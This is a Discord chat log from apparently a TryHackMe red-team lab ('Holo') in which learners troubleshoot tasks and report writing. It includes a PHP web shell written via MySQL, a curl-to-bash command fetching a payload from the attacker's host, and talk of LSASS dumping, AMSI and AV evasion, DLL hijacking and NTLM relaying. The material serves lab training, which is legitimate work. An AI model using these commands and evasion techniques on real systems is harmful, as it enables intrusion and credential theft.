#holo-network

well, svchost is just Windows' mechanism for running services

you can use techniques like process hollowing that start svchost, you halt the process, overwrite the process data with revshellcode and start the process again and you've got yourself a reverse shell

i need some help in the task 18. i have created a table in the D########DB database. now do i have to inject that php - <?php $cmd=$_GET["cmd"];system($cmd);?> in the column of the table?

@wind bobcat Is someone supposed to remain joined inside the holo room and see everything and start networks 👀 even after his/her sub ends? No right??

depends on how many days of access you have left

use the command given to you in the task

I was able to start the network somehow even though i couldnt access the holo room page anymore. I sent that bug report to support email and they say that Once you have joined Holo/ Wreath, you are indefinitely allowed to rejoin the room, whether you lose your streak or subscription :) which i dont think is true is it?

or maybe i misunderstood something?

it says the file already exists, but there is no file as shell.php in /var/www/html. and i have also tried to curl that page but that file does not exist.

Then there is a specific command to call that file... call url if you will...

curl is a good friend

wfuzz -c -b PHPSESSID=37jlf98alaak211660ga2j1lln -u http://admin.holo.live/dashboard.php?FUZZ=whoami -w /usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt

This command for task 13 gives me a lot of outputs that are of response code 200 , How do i narrow it down to what i want ?

see task details

oh right my bad

Thanks @wind bobcat

Gave +1 Rep to @wind bobcat

Because it does. You’re writing to a remote machine not the local machine. That is how you escape. Someone else got there before you and used the shell.php name. Just rename your shell and you’ll be good

can anyone confirm this? cry or spooky?

@outer junco or @clear zephyr can give you a definite yes or no, but if that's what Jabba told you, that's likely the case.

it does seem like a bit of a business logic flaw to me, but THM has their reasons for what they do. I wouldn't question it, just enjoy the free-forever access

but i cannot access holo after my subscription expired 👀

hhHdsdfsd

with some api stuff, i got the machine running 👀

see what those two have to say

totally confused rn

Thanks for letting me know - I'll pass this along to Ashu as he is behind the logic / code - not sure its intended.

Hey skidy, if that comes out as not intended, then will it be considered as a valid bug report?

If its not intended, it's more of a logic flaw and can technically be counted as a bug. Although, to achieve the "bug bounty" title we ask for three medium-high impact findings. However, I've passed the info to Ashu who will be able to answer this more accurately.
Either way, I appreciate you reporting this, thanks:)

well, i reported another one today. waiting for reply on that. one can receive tasks of any room( private/public/network/throwback) with public api, regardless if he/she has access to it or not. 👀 not sure if thats intended or not. 😅 anyways thanks for the response.

Gave +1 Rep to @outer junco

I need a network reset plz

you need to tell us what network you're on :p

probably holo

the network subnet :L

ah

my brain didn't think about there being multiple lol

10.200.186.0/24

or do you need mine?

and now you have to wait for people in that subnet to see it :d

i'm having trouble getting covenant to work on s-srv01

Same here, when i try to run the "grunt.exe" payload got no response back. When i try to run the payload with my virtual machine got the following exception
"Illegal characters in path."
After some research looks like it's due to a ssl certificate or something like that, i'm not really sure. If anyone already faced this issue with Covenant it's would be nice if he/she tells us what i can do to fix that.
Additional Information :
->Already tried with other launcher (Powershell) same issue "Illegal characters in path"
->Listerner option "UseSSL" set to false
->Covenant running as sudo and login with an admin account
->Tried to upload launchers with "ValidateCert" and "UseCertPinning" set as "true" first and then as "false" got the same error

about to restore my subscription, does holo use covenant like wreath used psempire?

I know you can use any framework to do it but was curious if its similar in the way it guides

or is it more of a blackbox type of deal

Similar

is anyone else getting a www-data user again on the same docker container on task 19

this a PEBCAK issue, think about what you're doing

PEBCAK very funny. Just want to know if anyone has meet the same problem. I don't want the answer.

Yes think Mark think just try harder

lets put it this way -- you're trying to pivot off of the container, there's a section about port scanning with limited resources and accessing MySQL Databases

Got it with a different method. Command suggested didn't work for me

#announcements message When is the last date to submit the Report and to whom?

It’s specified in the task

It's said in the Pwning & Prize task ;'..;'

Anyone know why my grunts don't get past stage0? Not really sure how to fix this

I'm having trouble with transferring my payload on to linux machine (task 13) , can someone help me ?

Did anyone use PssCaptureSnapshot on S-SRV01?

Nope not me

Can we use the application from the internet for dll hijacking. Or only the one present in vm.

its better you do it with the one in the vm

you can spin up a file server 👀

ok

Why?

I'm trying to be extra sneaky on the LSASS dump. I've got a nice exploit in Cpp but can't compile it with mingw and my broke PC can't run a win10 VM

I'm really trying to bag those sneaky points on the report 😆

Trying to completely avoid anything on the disk

So I was just curious is anybody used that to create a memory dump

I can't replace the dll file as i Don't have permission to.

How can i continue any hints?

if youre replacing anything youre doing it wrong

ohh

can i get a reset 10.200.139.x

You get a reset every hour ig

so i need to wait 2 hours and vote 2 times

Guess so

ok

Btw is using reg save "Loud"?

Anyway I can get LSASS dump without writing to disk?

let me go load falcon

place it on an smb share

I mean. If youre editing the registry I would say so

Sysmon will pick that up very quickly

Yeah that's what I was wondering.

White listing a directory with Powershell is also "Loud"

Thus I asked if anyone has used PssCaptureSnapshot

It's supposed to be sneaky

Really trying to bag those style points

Anyone able to help with getting a grunt on covenant? I can't get my grunt to progress past stage0

havent tried it myself cause my sub expired but this can work ig? 👀 cry sent that sometime back used to disable powershell logging.

Isn't this from the Hoot off blog thing?

Looks cool.

I saved this earlier lol

Btw, can't you still access networks after your sub expires?

nope, i mean there is a vulnerability 👀 which i found which is in review that its intended or not by which we can access it but not directly

I wanted to submit a report too :/ but Its hard to just make one from memory.

😦

did you bypass AV?

did you test the grunt?

I don't get any errors with threatcheck anymore so I think I have

I ran the grunt on my windows VM and I got a connection back but that also got stuck at stage0

then you have yet to fully clean it

just because Treatcheck says its clean doesnt mean it is

@lone spruce another stupid question: are you looking for the entire explanation of the DLL hijack or just a one liner would do

Its your report

We want to see what you can do

Not what we can do regurgitated through you

Any chance you could provide a hint on what I've missed? I've gone back over the THM room and redone the steps but I have the same problem so I must have missed the same thing

Nah I meant do we need to explain how we found the exact DLL or can we just go like 'we found a vulnerable DLL'

best thing would be to reference multiple articles, etc. Versions, mitigations, CVE if applicable, etc.

Aah sweet. Thanks man. That'll do :D

Should also include full path of vulnerable DLL, etc

Yeah I'll be verbose with that :D

@wind bobcat I guess the one thing we didn’t specify was audience. I think audience is important to the language and information of a report

I think for this more verbose and technical is better since the audience is us

you can always edit the task

no one's submitted a report yet, so

Kek

I guess I'll give up for now and come back to it later, been at this one task for 9 hours now 😂

Btw, by "being verbose" do you mean adding all scan results and stuff or will the key pieces of information do like a list of open ports and stuff(besides mentioning the obvious like tools used, wordlists, etc)

*And linking relevant topics, artciles, repos

Any hints or nudges in the right direction on what I'm missing would be greatly appreciated

Where are you stuck?

being verbose as in:

• citing your sources
• Including code snippets
• Being detailed in what steps you're taking to compromise a device, why, and how it works

not so much wordlists, scans, etc.

Read the referenced articles and blogs

Thanks @wind bobcat @lone spruce

Gave +1 Rep to @wind bobcat

Really appreciate all the help

if you (for example) are looking for hosts with something specific for the purpose of lateral movement, include that

assuming you weren't give a subnet and or any device info

and you wanted to find a domain controller, you'd scan for porta 88,389,636

Good evening,

Can someone dm to talk about the task 'Post Exploitation Watson left her locker open' ? I am really hard stuck.

Yes, that's what I've been doing.

Thanks for the pointers @wind bobcat :D

This really puts things into perspective

side note; presentation is going to account for a ton

if you have a gorgeous looking report that's mediocre, you'll score better than someone who has a perfect writeup written in notepad

I'll reread them now. I must have missed something when I read them the first time. Thank you!

Gave +1 Rep to @lone spruce

Could you talk about it here? It’s all guided so not a lot of worry about spoiling things

Oh boy. I'm very particular about my presentation xD

One misaligned line bugs my OCD to death xD

Plus Pandoc exists

For sureee, What I am not understanding is how we are able to jump from the smb creds for PC-FIlESRV01 (TASK 37) to bypass AppLocker (TASK 38) if we do not have any shell

that’s not bypassing applocker that is just accessing the device

you’re dumping hashes, passing the hash to get access, then using directory permissions to bypass applocker

if you find something it's would be nice if you tell what wrong 🙏 , i have the same issue than you cannot get the Grunt initiated even if TheatCheck tell's me that everything it's ok. 2 days now that i'm stuck in this task, tried multiple configuration with listener thinking that i did something wrong, tried with the Powershell and then the binary launcher, looked at different sources but nothing worked, so i dont really know what i did wrong 🤷 .
When i run the amsibypass with a wrapper the server response me with a "true" so i suppose that the amsi has been bypassed, when i run the payload with a wrapper got no response back from the server the grunt refuse to start. i tried to merge the amsibypass and a powershell launcher in one unique ".ps1" file and execute it with a wrapper the server response again with true but no grunt launched so dont really know. 🤷

read the articles

and don’t just half read them and assume you’re done

Actually read them

it’s literally spelled out for you directly in the articles all you have to do is copy it correctly

how you guys rebooted the vm?
I used shutdown /r

But still smb is open

Someone broke one of the subdomains of L-SRV01 and i cant reset..

What do you mean by broken

And you get one reset token an hour

i can't access it.

Pls check this @lone spruce

Stopped all the services as given

Error

Timeout in communication with remote server

only for 1 subdomain , the other 2 are working

the one not working was working a few hours ago

Thanks for the ansewring but that wasn't the thing I was looking for. The ip .35 has rdp enabled so I was able to login as the user

Gave +1 Rep to @lone spruce

@dire ferry try clearing cookies for that subdomain or going through incognito. Should work then

At least if that's the one I'm thinking of, the one that likes to not work if you have a session

That did the trick , thank you!

Gave +1 Rep to @river cradle

Btw, right now I am stuck finding the app vulnerable to dll hijacking. Using PowerUp, winpeas, seatbelt, wcmic and other tools. These are the only apps that I have found so far. Am i missing something?

Amazon SSM Agent
aws-cfn-bootstrap
AWS Tools for Windows
Microsoft Visual C++ 2019 X64 Minimum Runtime - 14.27.29112 
Microsoft Visual C++ 2019 X64 Additional Runtime - 14.27.29112
AWS PV Drivers
Wireshark
npcap

You’re trying too hard

do some manual enumeration of the file system

What does RDP have to do with applocker?

What am I supposed to do about this?

@wind bobcat here you go babes. I’m busy rn 😘

Btw, any ideas why I can't I scan any of the internal networks?

Like the DC/Fileserver and all that?

What do you mean by not scan

I'm sorry I didn't phrase it right

My nmap scans return all ports as closed

I have sshuttle port forward enabled

I can access the services

But nmap returns nothing

I ran nc -zv IP and it's returning all ports as open

I used the standard flags sudo nmap -A -T4 -n3 -Pn -oN Scan.res IP

Because sshuttle isn’t designed to port scan

Anyway I can tunnel my request through it?

I transferred a nmap static binary over to the server but that's just painful

Static nmap or chisel

Aah thanks man

Okay, I will try

Maybe, I explained poorly, the thing was that I didn't know the way to obtain something like a shell in task Task 38 from the credentials of task 37

Task 37 shows how to get a shell with evil winrm. Task 38 has nothing to do with credentials or shells

At least in my case I couldn't login using evil-winrm and I had to use rdesktop. It kind of does, because you need a shell/terminal in order to execute applocker-bypas-checker.ps1

RDP still has nothing to do with Task 38

That still falls under Task 37 you’re just doing it a different way

Sshtunnel is shit. I ended up using an ssh proxy

what's the problem on my scan? i used nmap -sV -sC -p- -v 10.200.x.0/24 --min-rate 5000,change the x using my subnet. Still got all host down

you're sending out 5,000 packets per second

that's a pretty large amount

can you can recommend a packet value?

i wouldn't specify a value

i wouldn't even have the min rate flag

Whaaaaa

Spooky tells lies

Min rate only rate

i still can't find the host

should i reset the network?

Did you slow down the scan?

yes, i slow down the scan to 1000

Definitely on the holo specific VPN?

see man i did as said. If smb is still open how can i continue??

I dunno

I can’t help you by the only information given is: SMB open, it’s not working

i was doing the ntlm relaying

in task 47

i stopped the services and rebooted the machine as written in the blog by spookysec

im not reciveing smb connection after running ntlmrelay

stuck on this stage

@wind bobcat

Did you tunnel your traffic?

The SMB server doesn’t just reach out to you after you stop it. You have to control it

Anybody having connectivity issues to external web server atm?

yeah using sshutle

i am now

Did you tunnel the SMB traffic specifically

yeah using portfwd in meterpreter

Now im getting these errors

Seems fine your just getting a lot of requests

The relay should be there

psexec aborting the connection

ok

smbexec worked

pesexec was having problem

Thank you. Amazing room.

wohoo

congrats

🥳

yes

I'm at task 28. Have two usernames, three passwords... none work. Always get an empty page when trying to log in, even with random user and pass... Some hint to point me in the right direction?

Should I re-check the two machines and see if there are more creds lurking somewhere maybe?

@lone spruce thanks for the nudge looking for the file system. I have almost finished the network and I was wondering what is the purpose of the machine S-SRV02.

Gave +1 Rep to @lone spruce

You do not need any password just a specific username. Read carefully the test in the task and try to reset the password of one of the users

just another machine to show maybe that once you got dc you own the domain

Warning: move_uploaded_file(C:\web\tmp\phpB903.tmp): failed to open stream: Invalid argument in C:\web\htdocs\upload.php on line 31

Warning: move_uploaded_file(): Unable to move 'C:\web\tmp\phpB903.tmp' to 'C:/web/htdocs/images/rv.shell.php' in C:\web\htdocs\upload.php on line 31
Sorry, there was an error uploading your file.

Is it due to the anti virus or just a bad bypass?

Task 29

Try to upload the php file from task 35, that file for sure you can upload it

ty

Usually AV

Nothing currently, There we’re some problems with it over using resources so we’ve pulled it for the moment

task 28 isnt working for me... I am accessing the website using socks5 proxy and when i try to reset password it says "email has been sent" but i dont see any reset token in developer (firefox) ??

the user im trying to reset is the one who was found in creds.txt

the user starts with g, right?

Ya

@wind bobcat

there is a token

there

have you tried using a different browser? You might be missing it. Firefox likes to hide the cookies tab, it's much easier to find on chromium

cookies

Ok so the url on the request has user and then token= but the leak is there ?

the leaked token is in the cookies, yes

is there an alpine image on the box, or am I supposed to build one and send it over?

No. Read what the command is doing and figure out how you can adjust it for your use case

Thank you, I figured that'd be the correct path

Gave +1 Rep to @wind bobcat

Anyone able to provide a sanity check on using evil-winrm through proxychains? I could've sworn I had the right hash but I get an authentication error

Evil win rm wack use rdp

It just decides it doesn’t feel like working some days

That worked, thanks

Just want to give some feedback. People should be told to use less threads (not even the mentioned 30-40). Because it is very annoying - I lose connectivity every 3 minutes, need to get back reverse shell and loosing connection again.
That's very sad, hopefully I will find a time slot, when not everyone is fuzzing.......

Ty

Gave +1 Rep to @lone spruce

👀 u can do it without fuzzing ig? i dont remember exactly but maybe u can. Dont quote me on that though

I mean you should tell the people to slow down the fuzzing.
The web facing server is down for like 30minutes now. I also can't reset the room because I need 35 votes.

This is really annoying => will stop doing this room because for me it is impossible.

Tried restarting VPN, rebooted my machine, tried Attack box but nothing changes.

whats your subnet

.69

you should consider reading the pins once 😄

The thing about leaving and rejoining? Didn't work

Got reassigned to the same subnet

oops

Thanks for your efforts and time, but I will take a break and do something else.
I have no more patience - have a nice weekend.

Gave +1 Rep to @livid shoal

@outer junco looks like we need a network expansion again possibly?

is the admin pass for the linux box in rockyou? it says it recommends rockyou to begin, I've ran it a few diffrent times so if it is, I'm messing up somehow

And for what it's worth, the .69 subnet is broken. It was the former testers subnet that end users shouldn't be placed into it. There is also notes in Task 9 and 10.

Oh wow yeah - we're already at 60 networks

I'll increase this to 100

lol Im nin the 69 subnet, great

if you grep rockyou for "linux", it will be one of the passwords in there unless someone has changed it

but as you just said, you're in the subnet from hell, lel

Once more networks are created, I'll move users to the new ones.

so I got stuck cracking the password and my subnet changed, I've been rehacking but my database seems to be offline. The admin page just hangs no matter the input. Anything that can be done other than waitng on resets?

I supose I can just wait until it turns off

what subnet are you on?

.189

hello, can anyone do a reset on holo network (subnet is 10.200.151.0)

t5 scans are very quick. I wouldn't recommend it.

they can cause machine instability

use rustscan if you want fast and stable

REALLY? Holo is a class B?!?!

I'm impressed. not relevant to your problem... so I'll shut up now

Class A private

Is this normal? When I try to run the vulnerable app task 43?

you're not supposed to run the vulnerable app

if you did, who's level of privileges would that give you?

Yeah I know

I should wait for the task

but nothing's happening

if it's been over 30 minutes, I'd suggest pushing for a restart

if that doesn't fix the issue, ensure you're doing the dll hijack properly

class a for the network, class c for the docker network specifically

ok thanks

You’re not supposed to run the app and applocker is what is blocking you from running it

Hi People, so i'm still trying my super sneaky moves on Holo and was wondering if there are any "silent" ways to get to the DC other than the one described in the task?

Not really

Once you own a DC it’s done you’re over

you can talk about clean up and exfiltration, cleaning your traces, etc

Just came back and I'm unable to ping the network after starting it again

Check the subnet, it might've changed

😦 it's still the same

Did you connect to the holo vpn?

yeah

I was cracking the hashes on colab went to eat and came back and I can't ping

I've rebooted and reconnected

what subnet are you in

10.200.175/xx

what machine are you trying to ping?

L-SRV01

I'm not getting a DHCP lease either

Maybe try to refresh the thm site and check if it's started

Been up for 21 minutes

I'll try regen a new config and try again

From 10.50.172.1 (10.50.172.1) icmp_seq=1 Destination Host Unreachable

Try to killall openvpn

maybe you have multiple openvpn instances

I've tried that still Destination Host Unreachable

Did you get the new vpn file?

yeah

then just vote for reset

voted it's on 2/3

I also left and rejoined the room before regenerating config file

yeah it's the holo network spawned a different machine and ping was working

daym

In the Pivoting section "Task 23" , it was said in an example that we can ping target machine using "proxychains ping <IP>", I'm not sure it works like that, you can't ping through a SOCKS proxy since it does not support the ICMP protocol. To my knowledge: A SOCKS proxy provides a TCP proxy service (SOCKS 5 added UDP Support). You cannot perform an ICMP Echo "via" a SOCKS proxy service. am I wrong ?

I don’t think SOCKS affects ICMP? @wind bobcat am I bugging out?

yes

Well

my brain is thinking of sshuttle

I have no clue what was going on in my head when I wrote that and I am too tired to worry about that now. Sounds like a tomorrow spooky thing

@wind bobcat how long is finals?

8 more hours?

How did you get it? I've tried and I can't do it. cracking !!

what have u tried

I have tried with hashcat and john with the dictionary they suggest on the web, but I can't get it

well you havent

if u used the wordlist they suggest you'd have cracked it lol

I can send you an image to the private if you could help me?

nah u can do it with what's provided just re read it

i have a problem with my network on subnet 10.200.151.X, the network up time is about 10 minutes and all the machines are unreachable in all services

For the docker breakout part, do you need to use port 53 or could you use say 54 instead?

I guess that was never really explained this time around

so

Port 53 is used because it’s obviously dns and looks nice with evasion shit

you can use any old port you want though

Ok, and do I need to do anything else than what is written in task 18 and 19 to get a rev shell and break out from the docker container?

Because I've done that a few times and reset the network but it's not working for me

I use the provided curl command at the end of task 19 and replace the ip and the port which my python server is on from 80 to 8000 (in the command) but get nothing. And when I look at my python server it says that 10.200.107.33 has requested /shellscript.sh and it gave a 200 status code

did you change the encoded execution?

I changed the 10.x.x.x to my tun0 ip and added two 0 after 80 because I opened a web server on that port instead

in the command

should I re encoded it the correct values?

This is the command I used: curl 'http://192.168.100.1:8080/shell.php?cmd=curl http%3A%2F%2F10.50.103.2%3A8000%2Fshellscript.sh|bash %26'

@wind bobcat

bsuy

defcon, remember

I’m aware I’m busy too

defcon, remember

nematode

you're not in rtv finals 😛

Im in workshops and meetings and shit

also you said 8 hours 12 hours ago

Still can't get any Grunt working on the target, i don't know what to do anymore i've been trying for days now 😩
I don't now how i can build a clean Grunt everything i try got me an "Illegal chars in path" when i try it in local and this even if i followed the RastaMouse blog so.
I think it's all about the sentence "Use your knowledge of HTTP requests and responses to break the signature." but actually i don't get how i can do this.
so any help will be welcome 😕

so it's flagging on // Hello World! {0}

so you should remove that and change it to something else

for example, maybe an innocuous picture of a raccoon, or maybe a blog about how much you like cats

hey

someone can helpme getting root with docker in task 20

if you haven't looked at GTFOBins, look at it. The command you need is there, you just need to alter the syntax slightly

i did it

i just dont see it

sudo install -m =xs $(which docker) . i have to execute docker exec then the command without the sudo

that's for creating the suid binary

you don't need to do that.

mmm

Well, so it was the "Hello world! {0}" who was flagged but changing it by what still don't get it ^^

Change it to literally anything

you can go into the profile and there is a section to change the body to whatever you want

so the main point it's about removing the " // Hello world! {0}" tag? and no mather what i put in the profile body after that? can i even left it how it is? means removing the tag en leaving the rest

Remove the tag, leave the rest, re-check and see if it still gets flagged

if it gets flagged, you know what it gets flagged on so you know what to change

generally, it's a better idea to change or add content, not so much remove it

hey i have a question im new in try hack me, why holo room says 3 day of acces? it will get removed?

theres a finite number of networks, it's to ensure that theres enough networks for everyone that wants to join

if you want to re-up your access, leave and rejoin

Nice

I sure love user shared networks https://i.imgur.com/Xw05gTx.gif

its been loading for over 4 minutes

holy crap it loaded :D

Hey! Could someone help me with breaking out of the docker container? I've followed every step that's in task 18 and 19, I've created the shell.php file in the DashboardDB database in mysql, I can curl it with commands such as whoami and get the www-data response. I've created a .sh file with the provided bash shell script and hosted it on a python webserver on port 8000, I changed it from port 53 to 54 also. I then took the unencoded curl command and adjusted it to be correct with my ip and port and url encoded it. This is the command I used: curl 'http://192.168.100.1:8080/shell.php?cmd=curl http%3A%2F%2F10.50.103.2%3A8000%2Fshellscript.sh|bash %26' and I excecuted it from the docker container (192.168.100.100). But when I run the command it nothing happens, if I look at the python webserver I see that 10.200.107.33 tried to get /shellscript.sh and it gave a 200 status code. But yet I didn't receive a connection on my nc listener. What could I be doing wrong?

can someone please assist me with getting a shell on the first machine?

I've tried several ways including php, python and bash

except none seem to work

I've used nc -lvp 1553 for the shells and python3 -m http.server 1553 for trying to download a php shell onto the website

@upper rock do not copy everything literally, some changes are needed

Do you know which commands I would need to change?

Everything looks pretty correct to me

@upper rock what about the shellscript.sh ? is it correct?

Ohh

I need to replace the tun0ip with my own ip, right?

pretty much 🙂

🤦‍♂️

Thank you very much @vapid girder

Gave +1 Rep to @vapid girder

I wrote a paragraph about the problem and all I missed was that I needed to replace it

Well, you learn something everyday :)

you are welcome, we all make mistakes, import is to learn from them 😉

@pale steeple you have command execution on the server so just get a revers shell - bash works, be aware of encoding

I'm on 22 and I'm unsure if Ive setup my port forward correctly

i'm using sshuttle and it gives me what I'd only assume are incorrect open ports

I can reach S-SRV01 which I couldn't w/o the forward

are you attempting to nmap with sshuttle? What do you mean incorrect open ports?

Someone here has win the PEN-300 Voucher??

the competition hasn't ended yet

Currently you have a 100% chance of winning it

you could literally submit me a picture of a bean and win

https://tenor.com/view/sad-sad-bean-sad-baby-rain-depressed-gif-15153737

what if two people sent that bean and noone else?

who'd win then

whoever sends me 69 lbs of beans first wins

give address

that will cost me less than an osep voucher

I need a hint for task 31 where do they want to Put code, on a windows VMware with visual studio?

@rugged leaf windows wm, powershell window, task 31 talks about amsi bypass in powershell

Ok but now on task 32 when I try to use tool all I get is ansi_result_detected

If I've setup chisel correctly should I be able to ping 10.200.X.31 using ```txt
proxychains4 -f /etc/proxychains4.conf ping 10.200.X.31

no, ping does not work through socks proxies

if it's a windows host you can often check (scan with nmap) ports 139/445 to see if you have set up the host correctly

ok, thank you! And should I be able to the web server on .31 by just typing the ip in the url?

Gave +1 Rep to @river cradle

or do I need to use the proxy through my browser to access it?

if you're using a socks proxy then you need to set up the proxy in the browser too

you can set it up globally in the settings, or use an extension like foxyproxy to quickly switch between proxies + add rules for only certain sites (like this host) to be routed through that proxy

perfect, thank you!

Nice network, congrats to the creators

When is deadline for report?

It's specified in the task. I'm no longer a sub so can't access the network iirc it's around September

okk tyty, I somewhat recall sept 15 but am having trouble finding it in da words. I also can't read lmao

Another question, though newer techniques are available for going through this network that are considered "noisy", would we be docked if we didn't test and report those possible issues?

it's outlined in the giveaway task lel

And no, this is a "red team assessment". Not a pentest.

you're not required to find all of the vulnerabilities within a network

Be sneky snake

ah, I c. tyty

hey guys! I need your help - I am stuck at Task 13, spawning the reverse shell - none of them from the cheat sheet seems to work oO any help?

hey, anyone else have a problem with the docker privesc in task 20 giving errors?

send me a dm if you still need help

At the end I have completed Holo :D, what an adventure XD. If anyone need help dm me
https://tryhackme.com/Marmeus/badges/hololive

on to report writing? 🥳

I am tented but I guess i am to lazy to do it XD

lol yea its a big task. but i would try to write this time. enjoyed holo way too much

I will try but I no promise anything XD

thanks for the encouragement

lol

@wind bobcat just out of interest, how many folks have submitted the report till now?

0

👀 looks like the competition is not that hard

Will we have access to the environment after the comp is over? It's super nice and id like to try more things on it as i learn more

no its being deleted

yeah, it'll stay up as long as Skidy and Ashu wants it up

Spooky what the heck

you nematode

huh

@SL#6245

@chrome cave what?

@outer onyx

Discord Cache is weird

wacky

anyways. I dont respond to DMs please send your question here

Draft report done. Time to make it pretty.

Pain, agony even
Ty for the info

Gave +1 Rep to @wind bobcat

oof u fast

I maybe the first to write a pentest report in html

with tailwind css lmao

I used Pandoc and markdown

i sort of didnt have a motivation to use it. I mean with css u can do wonders 👀

Hopefully I'll get them by Tomorrow. It's been one hell of a week and am tired.

Whereas markdown and word kinda restricts

@wind bobcat does indeed like a colourful presentation

But am just too noobish with css

wat

Also, a non native speaker, so there's that.

Great!! and since i am using a templating engine too with nodejs, I basically dont need to rewrite the repitative parts again and again

We are just talking about writing beautiful reports.

What engine though?

simple express with ejs

Aah. I'll stick to my markdown and hope the THM Gods like it xD

yea

whatever suits you. completely your choice

@wind bobcat what do u use to write reports? markdown?

How many reports have been submitted so far? 👉 👈

0

Aah, atleast a second place.

word

markdown is disgusting

........

yesss i prefer word too over markdown in documents atleast. Just wanted to try something new so thought of using html 👀

I rather used markdown because it's prettier than doc

And neat

u can do some nice styling in word too

and its prettier

as well

Too late :)

something like this works ig?

This but minimal and prettier

thats word

Would have sent a sneak peek but I don't wanna get disqualified

oh well, that was not my sneak peak 😂 . thats me just messing with some random stuff

Yeah I've seen this.

I bet Cry and Saupki would recognise my template in a jiffy

Hopefully, they like Cyan

i love cyan

Yeah, it's Soothing

That's the main theme color

Fingers crossed 🤞🏼

How about an anime themed report with their favourites

NOOOOOOOOO

https://tenor.com/view/ara-anime-eyebrow-up-gif-15721758

I will make a report after my tests on 21st maybe. Got some free time after that

Good luck :D

Idk how this one would be. Am very anxious and tired.

no anxious

no report submissions yet lmao

Hi i have a problem in the task 18

www-data@68198143b5cb:/var/www/admin$ mysql -h 192.168.100.1 -u admin -p
Enter password: 
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 12
Server version: 8.0.22-0ubuntu0.20.04.2 (Ubuntu)

Copyright (c) 2000, 2020, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> select '<?php $cmd=$_GET["cmd"];system($cmd);?>' INTO OUTFILE '/var/www/html/shell.php';
ERROR 1086 (HY000): File '/var/www/html/shell.php' already exists

curl 192.168.100.1:8080/shell.php?cmd=whoami

And i don't have a feedback

I have tried to regenerated config ovpn, reset 3 times the network, kill all openvpn proccess, reboot my computer and always nothing

I have tried also a ping and revshell but nothing

you didn’t encode your conmand

my curl command ?

Yes

url encode ?

i don't understand why i must encode the command

try renaming the file something else

He’s already uploaded the shell multiple times. It’s the command

I see nothing wrong with the command

there's nothing to url encode

whoami should work.

the only reason I could think of that it might not possibly display the command results is because not all php shell exec commands display output

passthru does, I know that off the top of my head

@wind bobcat in the task it’s specified to encode the spaces and use http with it encoded. I dunno I didn’t write the task

that's for the revshell callback nematode

Oh kekw

already test

try <?php passthru($_GET("cmd"));?>

Yo, guidance on finding the hijackable scheduled task? I've got a dll that will work, I just don't know any details about the task besides that there's a binary in a folder that is hijackable

you need to pull the executable down and do some manual analysis outlined in task 44

I think I've got that part down, as on a demo system my dll is loaded just fine

I'm just unsure of a good cli method to enumerate the scheduled task and its action

happened with me a ton of times - i dont exactly remember what i did - but can u try to use the other IP or try to select '<?php $cmd=$_GET["cmd"];system($cmd);?>' INTO OUTFILE '/var/www/html/shellone.php; and then use the curl otherip:8080/shellone.php?cmd=whoami

can u try curl http://192.168.1.100:8080/shell.php?cmd=whoami

me i am stuck on the AMSI bypass

it's meant to be simulated user interaction, not so much exploit the scheduled task

ohhhhh danke

when i run AmsiTrigger all i get Check Real Time protection is enabled

do i need to disable the av on the vm?

now all i got when i run the code from task 31 on AmsiTrigger is AMSI_RESULT_NOT_DETECTED

hey could I dm you for a sanity check? or am I just allowed to spill beans out here

we don't care, it's a guided network

Coolio, I've got my DLL named to kavremoverENU.dll and in the C:\users\watamet\applications folder.

My dll runs shellcode using createthread on DLL attach, this seems to be working as intended on stuff like notepad, etc.

When running locally on a demo machine, and even in environment, I can't get my dll loaded into kavremover.exe, not even with process hacker. Any ideas why?

Do I have to ditch dll attach? sign the dll? create an export of the functions utilized in the binary and make that my shellcode runner?

it shouldn’t be in the applications folder

it should be in the folder of the DLL it is expecting

ah ok tyty
Also, maybe im just bad at coding too. msfvenom stuff works just fine, custom loader does not

oh welp

What's the trigger period on it?

just to clarify, even though we have access to the room for a set number of days, reports can be submitted on the 15th of sept?

likely 5-10 minutes

the report can be submitted whenever

pog danke

if your report isn't finished right now you have a 100% chance of winning

like, honestly, you could submit a blank text document that says "report" and you'd currently have the best odds 💀

Noice haha, I have to remove stuff bc I was reporting a bunch of vulns that didn't help too much
tyty for the response

lmaoooo

😂

blank

wish i could submit it 😂 only if i had access to the network 😛

You can just email it right?

this should work? 😂 😂 😂

or wait you mean you didnt get enough screenshots

he didnt complete the room

Pain.

lolol, bite the bullet, spend 10 dollars, and get access to the room and gather screenshots from where you left off with a new acct

this is satire

yesir

which email do we even mail?

the one outlined in the task, nematode

i think i have previous notes for first 4 5 tasks

yo nematode leader i dont have the access

:)

reports@blacksunsecurity.com

@wind bobcat whats this website btw? I mean it leads to some kind of blog lol

well, get access nematode

do i use some kind of template?

I found a bug in tryhackme specifically for this which hopefully would get me a voucher so that i can access holo again 😂

reeeeeeeeeee

was going to do more with it ^^^^^ didn't have the time

ah

u completed holo no?

i would just put a nmap scan in there and submit report..thats all i have

i did but i dont remember it obviously. and i need to attach the screenshots which i didnt take at that time

:(

i have the soft release notes

did u change anything after that?

yes kekw

like after 15 july

the report task was added after it :/

reeeeeeeeee

if i had known that earlier, i would have been made it along with it sed lyf

i wouldnt have made it then as wlel

case i suck inreport writing smh

this is my first time too. I am just using html lol

I wouldn't even bother submitting an empty report, the minute someone submits a report with more than an nmap scan, you're going to to get kicked down to the last place kek

lmao yea ik

i want to make a full report for wreath as report practise

are screenshots an added advantage? I have to sorta make it from memory :/

if you lack major details (for example, a screenshot of you accessing the domain controller), then it'll negativity impact you. Remember, irl there is no flag.txt

yea thats true. also, what would be the reccomended patch for the ntlm relaying attack since it was written that it has no patch?

some things don't need to be patched

some things aren't exactly patchable

ahh so i can leave that part? or just write not patchable?

some technologies can be deployed to remediate vulnerabilities (if you reference the task, it told you to scan smb for something)

or should i just say stop using ntlm
-- microsoft 2021
😂 just kidding i get it thanks

Gave +1 Rep to @wind bobcat

I would accept that kekw

too bad Microsoft said no

There is like one fatal flaw that you can say to patch

it’s definitely referenced in the task

So I've got portfwd set up and all, but get conn refused when using psexec/smbexec. I've disabled my chisel tunneling so ntlmrelayx.py could use port 1080. What else should I check?

sshuttle > chisel for pivoting with this setup

you still need a proxy tunnel. use shhuttle

is it possible to do with chisel btw? I mean multiple proxychains is that a thing?

yes

proxy chains supports multiple config files

but the catch is you need to install proxy chainsng iirc

damb, I was starting to believe in chisel supremacy

tyty

